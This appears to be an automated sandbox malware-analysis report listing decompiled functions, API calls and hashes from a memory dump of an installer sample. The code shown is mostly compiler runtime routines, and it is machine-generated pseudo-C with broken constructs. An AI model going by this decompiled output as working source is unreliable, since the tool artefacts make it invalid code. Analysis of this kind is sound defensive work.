Uniqueness Score: -1.00%

Function 0040F0A9, Relevance: 9.0, APIs: 6, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F0A9(intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _t15;
				intOrPtr* _t16;
				signed int _t17;
				intOrPtr _t20;

				_t15 = _a8;
				_t20 = _a4;
				if (_t15 - 0x11 > 0) goto 0x498c99;
				_t17 =  *(_t15 + 0x4e64d8) & 0x000000ff;
				if(( *(_t20 + 0x63) & 0x00000040) != 0) {
					if( *((char*)(_t20 + _t15 + 0x6c)) == 0) {
						goto L1;
					} else {
						 *((intOrPtr*)(_t20 + _t15 * 4)) = _a12;
						return _t15;
					}
				} else {
					L1:
					_t16 =  *((intOrPtr*)(_t20 + _t15 * 4));
					if (_t17 != 4) goto 0x498c99;
					 *_t16 = _a12;
					return _t16;
				}
			}

0x0040f0b3
0x0040f0b7
0x0040f0be
0x0040f0c4
0x0040f0cf
0x0040f0f5
0x00000000
0x0040f0f7
0x0040f0fb
0x0040f101
0x0040f101
0x0040f0d1
0x0040f0d1
0x0040f0d1
0x0040f0d7
0x0040f0e1
0x0040f0e6
0x0040f0e6

APIs

abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f3f3ac9fbb1827cc8b2ed3dbd4b5ffb3c948c7f5701e77dfc4206dcaecd01e23
Instruction ID: 4b280692ebb2e7bb7107ba4db962947831ac0fb7ebb4d578e5fb2bb2aecf62aa
Opcode Fuzzy Hash: f3f3ac9fbb1827cc8b2ed3dbd4b5ffb3c948c7f5701e77dfc4206dcaecd01e23
Instruction Fuzzy Hash: FCF04FF09042415AD310EF5DD05277ABBA1BB82358F8418AFE940173A3CB2D9888C6AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4C0, Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040F4C0(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, char _a4) {
				intOrPtr _v0;
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v156;
				void _v284;
				char _v288;
				intOrPtr _v312;
				void* _t28;
				void* _t30;
				void* _t32;
				void* _t36;
				void* _t47;
				intOrPtr _t49;
				void* _t61;
				void* _t63;
				intOrPtr* _t65;

				_t61 = _t63;
				_t36 =  &_v156;
				_push(__edx);
				_push(__eax);
				E0040EB20( &_v284, _v0,  &_a4);
				_t47 = _t36;
				_t28 = memcpy(_t36,  &_v284, 0x20 << 2);
				_t65 = _t63 - 0x124 + 0xc;
				_t9 = _t28 + 0xc; // 0x90909090
				if( *_t9 != 0) {
					_t30 = E0040EDA0(_a4,  &_v288, _t47);
				} else {
					_t30 = E0040ECD0(_t28,  &_v288, _t47);
				}
				if (_t30 != 7) goto 0x498c9e;
				_t32 = L0040EED0( &_v284, _t36);
				_t49 = _v80;
				_v312 = _t49;
				 *_t65 = _v84;
				 *((intOrPtr*)(_t61 + E0040F2B0(_t32) + 4)) = _t49;
				return _v24;
			}

0x0040f4c1
0x0040f4cc
0x0040f4d2
0x0040f4d8
0x0040f4e8
0x0040f4f5
0x0040f4f7
0x0040f4f7
0x0040f4ff
0x0040f504
0x0040f555
0x0040f506
0x0040f506
0x0040f506
0x0040f50e
0x0040f51c
0x0040f521
0x0040f527
0x0040f52b
0x0040f535
0x0040f551

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c8ffdffc4ff7814e0b31865ef0187f9b513650e8c1e74da2f1b05eedcae50f
Instruction ID: 71d320f90686e0f199af2cf6c348256eeb801e575c851c9151fca64dd3f287b3
Opcode Fuzzy Hash: b5c8ffdffc4ff7814e0b31865ef0187f9b513650e8c1e74da2f1b05eedcae50f
Instruction Fuzzy Hash: A71159B190010CABCB14EFA5C8819EEB7B5EF85348F10887AAC0977352DA34AE45CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0E0, Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0040C119
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,-00000004,00000001,00AC04C4,?,00401492), ref: 0040C12A
GetCurrentThreadId.KERNEL32 ref: 0040C132
GetTickCount.KERNEL32 ref: 0040C13A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,-00000004,00000001,00AC04C4,?,00401492), ref: 0040C149

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 0727f9be8b76b1a2e252182f2a8b9e8526ea2ca35995f141f007020d46de2e2a
Instruction ID: 49e697d1f9a251297a72e7d5d11da42261256a5523147b1db737235b524eb878
Opcode Fuzzy Hash: 0727f9be8b76b1a2e252182f2a8b9e8526ea2ca35995f141f007020d46de2e2a
Instruction Fuzzy Hash: EB115EB5A083418FC310DF79F88854BBBE0FB88364F454D3AE845CB621EB35D8498B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040C190, Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040C1DF
UnhandledExceptionFilter.KERNEL32 ref: 0040C1EF
GetCurrentProcess.KERNEL32 ref: 0040C1F8
TerminateProcess.KERNEL32 ref: 0040C209
abort.MSVCRT ref: 0040C212

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 4764077d1168abec3e4bcfa67482a5981738077561ec3777f2bde86f59bdc155
Instruction ID: 563197cde357914f184cacef7c5dee4219358e7fa1404afe2707d351b3eca9a3
Opcode Fuzzy Hash: 4764077d1168abec3e4bcfa67482a5981738077561ec3777f2bde86f59bdc155
Instruction Fuzzy Hash: 4E112BB5904344CFC300EFADE98461ABBF0BB58344F41857DE8849B362E7789944CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C18C, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040C1DF
UnhandledExceptionFilter.KERNEL32 ref: 0040C1EF
GetCurrentProcess.KERNEL32 ref: 0040C1F8
TerminateProcess.KERNEL32 ref: 0040C209
abort.MSVCRT ref: 0040C212

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 918daef727d63087753d14d502bd764adeaa02ac7505bbf189260c1e7da0a8bf
Instruction ID: ee1af7dbe212b7c3dfacda3ff43808596aca9ce1193ac0f85a3cca80f95d958d
Opcode Fuzzy Hash: 918daef727d63087753d14d502bd764adeaa02ac7505bbf189260c1e7da0a8bf
Instruction Fuzzy Hash: AC1135B1804284CFC700EFB9E9886197BF0BB18344F01857DE9449B262E7789944CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 00421220, Relevance: 6.5, APIs: 5, Instructions: 214stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00421246
memcmp.MSVCRT ref: 00421269
memcmp.MSVCRT ref: 004212DE
memcmp.MSVCRT ref: 0042134F

Part of subcall function 00491D20: strlen.MSVCRT ref: 00491D2E

memcmp.MSVCRT ref: 004213E5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: memcmp$strlen
String ID:
API String ID: 3738950036-0
Opcode ID: 4906b840a7e7c61d96ce5af11179a9d5e02e752965d408304e48a73e99453351
Instruction ID: 5c8901758858a3c9de8a8d7c1f011b242551e3947a7dfcdec4f9934f67557a8b
Opcode Fuzzy Hash: 4906b840a7e7c61d96ce5af11179a9d5e02e752965d408304e48a73e99453351
Instruction Fuzzy Hash: 0B6148716093159F8300AF69D98481FFBE5EFD9788F54892EE8C887321D375E8408B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8F0, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344
stringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040B8F0(signed char* __eax, intOrPtr __ecx, signed int __edx) {
				void* _v16;
				char _v32;
				signed int _v36;
				char _v40;
				char* _v44;
				signed int _v48;
				char _v52;
				char* _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				signed int _v80;
				char _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				signed int _v380;
				char _v384;
				char* _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed char* _v404;
				signed int _v408;
				intOrPtr _v412;
				char _v416;
				intOrPtr* _v432;
				intOrPtr _v436;
				signed int _v440;
				intOrPtr _v444;
				signed int _v448;
				void* _v461;
				char _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				signed int _t151;
				signed int _t153;
				intOrPtr _t155;
				void* _t158;
				signed int _t160;
				signed int _t169;
				signed int _t174;
				intOrPtr _t187;
				signed int _t191;
				int _t198;
				signed int _t200;
				signed int _t204;
				signed int _t205;
				signed char* _t208;
				char* _t211;
				signed char* _t213;
				signed int _t214;
				signed char* _t219;
				signed char* _t220;
				signed int _t224;
				signed char* _t228;
				signed char _t231;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t243;
				signed int _t244;
				signed int _t246;
				intOrPtr* _t247;
				signed int _t249;
				signed int _t253;
				signed int _t255;
				signed int _t262;
				signed int _t268;
				signed int _t269;
				signed char* _t270;
				signed int _t273;
				signed char* _t274;
				signed char* _t277;
				void* _t278;
				void* _t279;
				intOrPtr* _t280;
				intOrPtr* _t282;
				void* _t288;

				_t233 = __edx;
				_t208 = __eax;
				_t280 = _t279 - 0x1cc;
				_t151 =  *__eax & 0x000000ff;
				_v432 = __edx;
				_v436 = __ecx;
				_v440 = _t151;
				_t288 = _t151 - 0x5f;
				if(_t288 == 0) {
					__eflags = __eax[1] - 0x5a;
					_t262 = 1;
					if(__eax[1] != 0x5a) {
						goto L1;
					} else {
					}
				} else {
					L1:
					asm("repe cmpsb");
					asm("sbb al, 0x0");
					_t262 = 0;
					if((_t151 & 0xffffff00 | _t288 > 0x00000000) == 0) {
						_t204 =  *(_t208 + 8) & 0x000000ff;
						if((_t233 & 0xffffff00 | _t204 == 0x0000002e | 0 | _t204 == 0x0000005f) != 0 || _t204 == 0x24) {
							_t205 =  *(_t208 + 9) & 0x000000ff;
							if(_t205 == 0x44) {
								L27:
								_t262 = 0;
								__eflags =  *((char*)(_t208 + 0xa)) - 0x5f;
								if( *((char*)(_t208 + 0xa)) == 0x5f) {
									__eflags = _t205 - 0x49;
									_t262 = ((_t205 & 0xffffff00 | _t205 != 0x00000049) & 0x000000ff) + 2;
								}
							} else {
								_t262 = 0;
								if(_t205 == 0x49) {
									goto L27;
								}
							}
						}
					}
				}
				 *_t280 = _t208;
				_t153 = strlen(??);
				_v416 = _t208;
				_t273 = _t153;
				_v408 = 0x11;
				_v412 = _t208 + _t153;
				_t155 = _t273 + _t273;
				_v444 = _t155;
				_v392 = _t155;
				_v404 = _t208;
				_v396 = 0;
				_v380 = _t273;
				_v384 = 0;
				_v376 = 0;
				_v372 = 0;
				_v368 = 0;
				_v364 = 0;
				_t158 = L0040CF70(_t273 << 5);
				_t160 =  &_v461 >> 2;
				_t234 = _t160;
				_t224 = _t160 * 4;
				_t282 = _t280 - _t158 - L0040CF70(0xf + _t273 * 4 >> 4 << 4);
				_v400 = _t224;
				_v388 =  &_v464;
				if(_t262 == 1) {
					__eflags = _v440 - 0x5f;
					if(_v440 != 0x5f) {
						goto L14;
					} else {
						__eflags =  *((char*)(_t208 + 1)) - 0x5a;
						if( *((char*)(_t208 + 1)) != 0x5a) {
							goto L14;
						} else {
							_v404 = _t208 + 2;
							_t264 = E00405070( &_v416, _t224, 1);
							__eflags = _v408 & 0x00000001;
							if((_v408 & 0x00000001) != 0) {
								_t274 = _v404;
								_t169 =  *_t274 & 0x000000ff;
								__eflags = _t169 - 0x2e;
								if(_t169 == 0x2e) {
									_t228 = _t274;
									_t191 = _t264;
									do {
										_t243 = _t228[1] & 0x000000ff;
										_t124 = _t243 - 0x61; // -7
										__eflags = _t124 - 0x19;
										if(_t124 <= 0x19) {
											L49:
											_t244 = _t228[2] & 0x000000ff;
											_t213 =  &(_t228[2]);
											_v440 = _t244;
											__eflags = _t244 - 0x61 - 0x19;
											if(_t244 - 0x61 <= 0x19) {
												L51:
												_v440 = _t191;
												goto L52;
												do {
													do {
														L52:
														_t213 =  &(_t213[1]);
														_t246 =  *_t213 & 0x000000ff;
														__eflags = _t246 - 0x61 - 0x19;
													} while (_t246 - 0x61 <= 0x19);
													__eflags = _t246 - 0x5f;
												} while (_t246 == 0x5f);
												_t191 = _v440;
												goto L36;
											} else {
												__eflags = _v440 - 0x5f;
												if(_v440 != 0x5f) {
													_t246 = _v440 & 0x000000ff;
													goto L36;
												} else {
													goto L51;
												}
											}
											goto L46;
										} else {
											__eflags = _t243 - 0x5f;
											if(_t243 == 0x5f) {
												goto L49;
											} else {
												__eflags = _t243 - 0x30 - 9;
												if(_t243 - 0x30 > 9) {
													_t264 = _t191;
													_t169 =  *_t228 & 0x000000ff;
												} else {
													_t246 =  *_t228 & 0x000000ff;
													_t213 = _t228;
													L36:
													__eflags = _t246 - 0x2e;
													if(_t246 == 0x2e) {
														while(1) {
															_t269 = _t213[1] & 0x000000ff;
															__eflags = _t269 - 0x30 - 9;
															if(_t269 - 0x30 > 9) {
																goto L43;
															}
															_t253 = _t213[2] & 0x000000ff;
															_t270 =  &(_t213[2]);
															_t129 = _t253 - 0x30; // -47
															__eflags = _t129 - 9;
															if(_t129 <= 9) {
																do {
																	_t270 =  &(_t270[1]);
																	_t253 =  *_t270 & 0x000000ff;
																	_t130 = _t253 - 0x30; // -47
																	__eflags = _t130 - 9;
																} while (_t130 <= 9);
															}
															_t213 = _t270;
															__eflags = _t253 - 0x2e;
															if(_t253 == 0x2e) {
																continue;
															}
															goto L43;
														}
													}
													L43:
													_v404 = _t213;
													_t214 = _v396;
													_t268 = _t213 - _t228;
													__eflags = _t214 - _v392;
													if(_t214 >= _v392) {
														L48:
														_t247 = 0;
													} else {
														_t247 = (_t214 << 4) + _v400;
														 *((intOrPtr*)(_t247 + 4)) = 0;
														_v396 = _t214 + 1;
														__eflags = _t268;
														if(_t268 == 0) {
															goto L48;
														} else {
															 *((intOrPtr*)(_t247 + 4)) = 0;
															 *_t247 = 0;
															 *(_t247 + 8) = _t228;
															 *(_t247 + 0xc) = _t268;
														}
													}
													goto L46;
												}
											}
										}
										goto L16;
										L46:
										 *_t282 = _t247;
										_t191 = E00402520(_t191, 0x4d);
										_t228 = _v404;
										_t249 =  *_t228 & 0x000000ff;
										__eflags = _t249 - 0x2e;
									} while (_t249 == 0x2e);
									_t264 = _t191;
									_t169 = _t249;
								}
							} else {
								_t169 =  *_v404 & 0x000000ff;
							}
							goto L16;
						}
					}
				} else {
					if(_t262 == 0 || _t262 > 3) {
						_t264 = E00403DE0( &_v416, _t224, __eflags);
						_t169 =  *_v404 & 0x000000ff;
						L16:
						__eflags = _t264;
						if(_t264 == 0) {
							goto L14;
						} else {
							goto L17;
						}
					} else {
						_t277 = _t208 + 0xb;
						_v404 = _t277;
						if( *((char*)(_t208 + 0xb)) == 0x5f) {
							__eflags =  *((char*)(_t208 + 0xc)) - 0x5a;
							if( *((char*)(_t208 + 0xc)) != 0x5a) {
								goto L10;
							} else {
								_v404 = _t208 + 0xd;
								_t231 = E00405070( &_v416, _t224, 0);
							}
						} else {
							L10:
							_v448 = _t234;
							_v440 = _t224;
							 *_t282 = _t277;
							_t198 = strlen(??);
							_t255 = _v448;
							_t231 = _v440;
							if(_v444 <= 0) {
								L29:
								_t231 = 0;
							} else {
								 *((intOrPtr*)(4 + _t255 * 4)) = 0;
								_v396 = 1;
								if(_t198 == 0) {
									goto L29;
								} else {
									 *((intOrPtr*)(8 + _t255 * 4)) = _t277;
									 *(_t255 * 4) = 0;
									 *(0xc + _t255 * 4) = _t198;
								}
							}
						}
						 *_t282 = 0;
						_t200 = E00402520(_t231, (0 | _t262 != 0x00000002) + 0x43);
						_t219 = _v404;
						_t264 = _t200;
						 *_t282 = _t219;
						_t220 = _t219 + strlen(??);
						_v404 = _t220;
						_t169 =  *_t220 & 0x000000ff;
						if(_t200 != 0) {
							L17:
							__eflags = _t169;
							if(_t169 != 0) {
								goto L14;
							} else {
								_v100 = 0;
								_v104 = 0;
								_t211 =  &_v360;
								_v96 = _v432;
								_v88 = 0;
								_v92 = _v436;
								_v84 = 0;
								_v68 = 0;
								_v64 = 0;
								_v80 = 0;
								_v76 = 0;
								_v72 = 0;
								_v60 = 0;
								_v56 = 0;
								_v52 = 0;
								_v48 = 0;
								_v44 = 0;
								_v40 = 0;
								_v36 = 0;
								E004025E0( &_v36, _t264,  &_v48);
								_t174 = _v48;
								_v32 = 0;
								_t238 = _v36 * _t174;
								__eflags = _t174;
								_v432 = _t282;
								_t175 =  <=  ? 1 : _t174;
								_v36 = _t238;
								L0040CF70(0xf + ( <=  ? 1 : _t174) * 8 >> 4 << 4);
								__eflags = _t238;
								_t239 =  <=  ? 1 : _t238;
								L0040CF70(0xf + ( <=  ? 1 : _t238) * 8 >> 4 << 4);
								_v56 =  &_v464;
								_v44 =  &_v464;
								E00405780(_t211, _t264, 0x11);
								_t187 = _v104;
								 *((char*)(_t278 + _t187 - 0x164)) = 0;
								_v468 = _v92;
								_v472 = _t187;
								 *_v432 = _t211;
								_v96();
								__eflags = _v80;
								_t104 = _v80 == 0;
								__eflags = _t104;
								return 0 | _t104;
							}
						} else {
							L14:
							return 0;
						}
					}
				}
			}

0x0040b8f0
0x0040b8f6
0x0040b8f8
0x0040b8fe
0x0040b901
0x0040b907
0x0040b90d
0x0040b913
0x0040b915
0x0040bc92
0x0040bc96
0x0040bc9b
0x00000000
0x00000000
0x0040bca1
0x0040b91b
0x0040b91b
0x0040b927
0x0040b92c
0x0040b92e
0x0040b932
0x0040b934
0x0040b944
0x0040b94a
0x0040b950
0x0040bce0
0x0040bce0
0x0040bce2
0x0040bce6
0x0040bcec
0x0040bcf6
0x0040bcf6
0x0040b956
0x0040b956
0x0040b95a
0x00000000
0x00000000
0x0040b95a
0x0040b950
0x0040b944
0x0040b932
0x0040b960
0x0040b963
0x0040b968
0x0040b96e
0x0040b973
0x0040b97d
0x0040b983
0x0040b986
0x0040b98c
0x0040b997
0x0040b99d
0x0040b9a7
0x0040b9ad
0x0040b9b7
0x0040b9c1
0x0040b9cb
0x0040b9d5
0x0040b9df
0x0040b9ea
0x0040b9ed
0x0040b9ef
0x0040ba08
0x0040ba0a
0x0040ba14
0x0040ba1d
0x0040bc43
0x0040bc4a
0x00000000
0x0040bc50
0x0040bc50
0x0040bc54
0x00000000
0x0040bc5a
0x0040bc62
0x0040bc75
0x0040bc77
0x0040bc7e
0x0040bd10
0x0040bd16
0x0040bd19
0x0040bd1b
0x0040bd21
0x0040bd23
0x0040bd30
0x0040bd30
0x0040bd34
0x0040bd37
0x0040bd3a
0x0040be14
0x0040be14
0x0040be18
0x0040be1e
0x0040be26
0x0040be29
0x0040be34
0x0040be34
0x0040be34
0x0040be40
0x0040be40
0x0040be40
0x0040be40
0x0040be43
0x0040be4b
0x0040be4b
0x0040be4f
0x0040be4f
0x0040be54
0x00000000
0x0040be2b
0x0040be2b
0x0040be32
0x0040be69
0x00000000
0x00000000
0x00000000
0x00000000
0x0040be32
0x00000000
0x0040bd40
0x0040bd40
0x0040bd43
0x00000000
0x0040bd49
0x0040bd4c
0x0040bd4f
0x0040be5f
0x0040be61
0x0040bd55
0x0040bd55
0x0040bd58
0x0040bd5a
0x0040bd5a
0x0040bd5d
0x0040bd60
0x0040bd60
0x0040bd67
0x0040bd6a
0x00000000
0x00000000
0x0040bd6c
0x0040bd70
0x0040bd73
0x0040bd76
0x0040bd79
0x0040bd80
0x0040bd80
0x0040bd83
0x0040bd86
0x0040bd89
0x0040bd89
0x0040bd80
0x0040bd8e
0x0040bd90
0x0040bd93
0x00000000
0x00000000
0x00000000
0x0040bd93
0x0040bd60
0x0040bd95
0x0040bd97
0x0040bd9d
0x0040bda3
0x0040bda5
0x0040bdab
0x0040be10
0x0040be10
0x0040bdad
0x0040bdb5
0x0040bdbb
0x0040bdc2
0x0040bdc8
0x0040bdca
0x00000000
0x0040bdcc
0x0040bdcc
0x0040bdd3
0x0040bdd9
0x0040bddc
0x0040bddc
0x0040bdca
0x00000000
0x0040bdab
0x0040bd4f
0x0040bd43
0x00000000
0x0040bddf
0x0040bddf
0x0040bdeb
0x0040bdf0
0x0040bdf6
0x0040bdf9
0x0040bdf9
0x0040be02
0x0040be04
0x0040be04
0x0040bc84
0x0040bc8a
0x0040bc8a
0x00000000
0x0040bc7e
0x0040bc54
0x0040ba23
0x0040ba25
0x0040bafe
0x0040bb06
0x0040bb09
0x0040bb09
0x0040bb0b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ba34
0x0040ba34
0x0040ba3b
0x0040ba41
0x0040bcb0
0x0040bcb4
0x00000000
0x0040bcba
0x0040bcbf
0x0040bcd2
0x0040bcd2
0x0040ba47
0x0040ba47
0x0040ba47
0x0040ba4d
0x0040ba53
0x0040ba56
0x0040ba61
0x0040ba69
0x0040ba6f
0x0040bd00
0x0040bd00
0x0040ba75
0x0040ba75
0x0040ba80
0x0040ba8c
0x00000000
0x0040ba92
0x0040ba92
0x0040ba9f
0x0040baaa
0x0040baaa
0x0040ba8c
0x0040ba6f
0x0040bab3
0x0040bac5
0x0040baca
0x0040bad0
0x0040bad2
0x0040bada
0x0040badc
0x0040bae2
0x0040bae7
0x0040bb0d
0x0040bb0d
0x0040bb0f
0x00000000
0x0040bb11
0x0040bb1c
0x0040bb20
0x0040bb27
0x0040bb2d
0x0040bb36
0x0040bb3d
0x0040bb43
0x0040bb4a
0x0040bb51
0x0040bb58
0x0040bb5f
0x0040bb66
0x0040bb6d
0x0040bb74
0x0040bb7b
0x0040bb82
0x0040bb89
0x0040bb90
0x0040bb97
0x0040bb9e
0x0040bba3
0x0040bbae
0x0040bbb5
0x0040bbb8
0x0040bbba
0x0040bbc0
0x0040bbca
0x0040bbd3
0x0040bbda
0x0040bbdc
0x0040bbf0
0x0040bbfe
0x0040bc05
0x0040bc0a
0x0040bc0f
0x0040bc1b
0x0040bc23
0x0040bc27
0x0040bc2b
0x0040bc2e
0x0040bc36
0x0040bc38
0x0040bc38
0x0040bc42
0x0040bc42
0x0040bae9
0x0040bae9
0x0040baf2
0x0040baf2
0x0040bae7
0x0040ba25

APIs

strlen.MSVCRT ref: 0040B963
strlen.MSVCRT ref: 0040BA56
strlen.MSVCRT ref: 0040BAD5

Strings

_GLOBAL_, xrefs: 0040B91B

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: strlen
String ID: _GLOBAL_
API String ID: 39653677-770460502
Opcode ID: a2deedd37e2d3516f9717394aa0e78e4051e50f5630ec89d8279f23b07657136
Instruction ID: e852715fc3aaf969378139fa55caf127ca43fc16777948581b3ffb7f5d7e66d5
Opcode Fuzzy Hash: a2deedd37e2d3516f9717394aa0e78e4051e50f5630ec89d8279f23b07657136
